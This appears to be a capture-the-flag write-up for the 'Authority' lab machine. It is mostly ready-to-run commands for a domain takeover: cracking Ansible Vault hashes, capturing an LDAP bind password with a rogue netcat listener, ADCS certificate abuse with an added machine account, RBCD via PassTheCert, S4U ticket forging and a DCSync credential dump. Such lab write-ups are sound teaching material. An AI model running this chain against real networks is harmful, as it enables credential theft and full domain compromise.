Authority
Overview
Authority exposes Ansible Vault hashes in an SMB Development share. Cracking them reveals a PWM (Password Manager Web) admin password. PWM's LDAP test feature leaks the svc_ldap credentials by pointing it at a controlled listener. BloodHound confirms svc_ldap can add machine accounts. A vulnerable ADCS template (CorpVPN) allows requesting a certificate for Administrator from a new machine account. PassTheCert then configures RBCD from the machine account to the DC, and a final S4U2Proxy flow yields a CIFS ticket for DCSync.
Recon
Nmap
sudo nmap -sC -sV -vv -oA tcp 10.129.229.56 && sudo nmap -sC -sV -vv -p- -oA allports 10.129.229.56Port 80 is the default IIS page. Port 8443 hosts the PWM web interface but requires a password:
SMB - Development Share
Enumerate as guest:
The Development share contains interesting data:
PWM version: 2.0.3 is identified.
Download everything from the Development share using NXC spider:
nxc smb 10.129.229.56 -u guest -p '' -M spider_plus -o DOWNLOAD_FLAG=trueAnsible Vault Hash Cracking
The share contains Ansible Vault-encrypted strings. Each vault hash must be in its own file in this format for john to process:
$ANSIBLE_VAULT;1.1;AES256
633038313035343032663564623737313935613133633130383761663365366662326264616536303437333035366235613437373733316635313530326639330a643034623530623439616136363563346462373361643564383830346234623235313163336231353831346562636632666539383333343238343230333633350a6466643965656330373334316261633065313363363266653164306135663764Convert to crackable format with ansible2john:
ansi_vault_hash:$ansible$0*0*2fe48d56e7...Crack with john or hashcat.
Decrypt Ansible Vault Data
With the cracked password, decrypt the vault contents:
cat 1 | ansible-vault decryptPWM admin password: pWm_@dm!N_!23
Foothold
PWM LDAP Credential Capture
Log into PWM at port 8443 with the recovered password:
PWM stores an LDAP bind password and provides a "Test LDAP Connection" feature in its editor. The password is already pre-filled (masked). By changing the LDAP server to our own machine and starting a netcat listener, when we test the connection PWM sends the stored cleartext LDAP password to us:
Captured credentials: svc_ldap:lDaP_1n_th3_cle4r!
BloodHound Collection
bloodhound-ce-python -c all -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -d authority.htb \
-dc authority.htb --dns-tcp -ns 10.129.229.56svc_ldap is a member of the Remote Management group:
WinRM access as svc_ldap.
Privilege Escalation
ADCS - Vulnerable Template (CorpVPN)
Enumerate ADCS templates for misconfigurations:
certipy-ad find -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -dc-ip 10.129.229.56 -vulnerableMachine Account Quota
Confirm svc_ldap can create machine accounts (MachineAccountQuota > 0):
nxc ldap 10.129.229.56 -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -M maqAdd a new machine account:
impacket-addcomputer -dc-ip 10.129.229.56 -computer-name syk0 \
authority.vl/svc_ldap:'lDaP_1n_th3_cle4r!'Request Certificate as Administrator
Use the new machine account to request a certificate from the CorpVPN template with the Administrator UPN:
certipy-ad req -username syk0$ -password 0DfbpaONGq6DnSPQ6G2wF9QsgoVu6YW2 \
-ca AUTHORITY-CA -template CorpVPN -dc-ip 10.129.229.56 \
-upn [email protected] -dns authority.htb -debugPassTheCert - RBCD Configuration
The certificate can be used with PassTheCert to modify AD attributes via LDAPS. Configure RBCD so our machine account (SYK0$) can delegate to the DC (AUTHORITY$):
python3 impacket-passthecert.py -action write_rbcd \
-crt cert.crt -key cert.key \
-domain authority.htb -dc-ip 10.129.229.56 -port 636 \
-delegate-to 'AUTHORITY$' -delegate-from 'SYK0$'S4U2Proxy → CIFS Ticket
Request a service ticket impersonating Administrator to the DC's CIFS service:
impacket-getST -spn 'cifs/AUTHORITY.authority.htb' -impersonate Administrator \
'authority.htb/syk0$:RawapPCb2zTGcQvBV4I9WHnwqwNPtiHU'Export the ticket:
export KRB5CCNAME=Administrator@[email protected]DCSync
Use the impersonated ticket to perform DCSync:
impacket-secretsdump -just-dc-user Administrator -k -no-pass \
authority.htb/[email protected]Attack Chain Summary
| Phase | Technique | Result |
|---|---|---|
| Recon | SMB Development share | Ansible Vault hashes |
| Credential access | john → ansible-vault decrypt | pWm_@dm!N_!23 |
| LDAP capture | PWM test connection → netcat | svc_ldap:lDaP_1n_th3_cle4r! |
| Foothold | Evil-WinRM | Shell as svc_ldap |
| Machine account | impacket-addcomputer | syk0$ created |
| ADCS | CorpVPN template + UPN spoofing | Certificate as administrator |
| RBCD | PassTheCert write_rbcd | syk0$ → AUTHORITY$ delegation |
| Privesc | getST S4U2Proxy + DCSync | Administrator hash |